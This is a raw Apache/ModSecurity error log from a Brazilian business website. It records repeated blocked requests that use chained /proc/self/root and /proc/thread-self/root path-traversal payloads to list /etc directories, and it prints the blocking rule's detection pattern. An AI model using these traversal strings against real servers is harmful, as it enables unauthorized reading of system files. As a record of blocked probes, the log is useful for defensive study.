[Fri Mar 20 00:14:04.314075 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:38116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7fMdf6f5d65gmYZSsiQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:11.687591 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:38188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7gxCii7xarUs8iHYc5AAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:16.991195 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:38190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7iP-YZRR_7pZ7nDK_ygAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:22.807013 2026] [:error] [pid 19655:tid 140411725141760] [client 74.7.241.31:45108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7jk1ujooLWdUDGy4ICgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:24.565422 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:49710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7kOoXxyEfFpUF8f8_8QAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:25.123183 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55650] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:14:26.439595 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:45110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7kgkwaGbbGflqUZD-XAAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:29.288480 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:60120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7lcdf6f5d65gmYZSsmgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:36.173205 2026] [:error] [pid 5816:tid 140411540502272] [client 74.7.241.31:60134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7nJfmNfuxceSuAELG-gAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:40.758702 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:35062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7oPqxLDW4GITHUkScWwAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:41.017603 2026] [mime_magic:error] [pid 5816:tid 140411716749056] (70014)End of file found: [client 57.141.18.122:32878] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:14:46.545041 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:35078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7pgbLMZ6AikZjR9WQZgAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:53.300776 2026] [:error] [pid 20435:tid 140411582465792] [client 74.7.241.31:56336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7rJJaM1-0uhhUQJNLOgAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:54.129802 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56596] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:14:58.702848 2026] [:error] [pid 20435:tid 140411641214720] [client 74.7.241.31:47412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7spJaM1-0uhhUQJNLPgAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:02.927228 2026] [:error] [pid 20435:tid 140411607643904] [client 74.7.243.128:51030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7tpJaM1-0uhhUQJNLQgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 00:15:08.647941 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:33964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7vAbLMZ6AikZjR9WQeAAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:19.938058 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:52586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7x-oXxyEfFpUF8f9AHgAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:26.121806 2026] [proxy_fcgi:error] [pid 7893:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57526] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:15:30.338219 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:59166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby70hCii7xarUs8iHYdBgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:33.794811 2026] [mime_magic:error] [pid 5816:tid 140411582465792] (70014)End of file found: [client 57.141.18.72:34506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:15:41.469483 2026] [:error] [pid 20435:tid 140411741927168] [client 74.7.241.31:54678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby73ZJaM1-0uhhUQJNLewAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:41.686598 2026] [:error] [pid 20435:tid 140411741927168] [client 74.7.241.31:54678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby73ZJaM1-0uhhUQJNLfAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:42.230510 2026] [:error] [pid 20435:tid 140411741927168] [client 74.7.241.31:54678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby73pJaM1-0uhhUQJNLfgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:49.687381 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:52676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby75eoXxyEfFpUF8f9AMQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:51.580115 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:50030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby758df6f5d65gmYZSs3gAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
